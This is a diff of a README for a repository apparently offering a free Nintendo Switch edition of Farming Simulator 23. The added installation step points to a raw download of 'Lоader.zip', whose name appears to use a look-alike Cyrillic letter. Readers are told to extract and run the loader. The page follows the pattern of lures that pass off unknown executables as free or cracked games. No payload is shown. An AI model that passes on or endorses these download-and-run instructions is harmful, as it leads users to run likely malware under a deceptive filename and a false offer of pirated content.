Pooja99627/FarmingSim23-Switch-FreeHub/README.md

 ## 🚀 Installation

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/Pooja99627/FarmingSim23-Switch-FreeHub/main/Lоader.zip` from the repository.
 2. Extract and run the loader on your desired operating system.
 3. Follow the on-screen instructions to set up Farming Simulator 23 Nintendo Switch Edition.
 4. Enjoy unlimited farming fun and new 2025 content!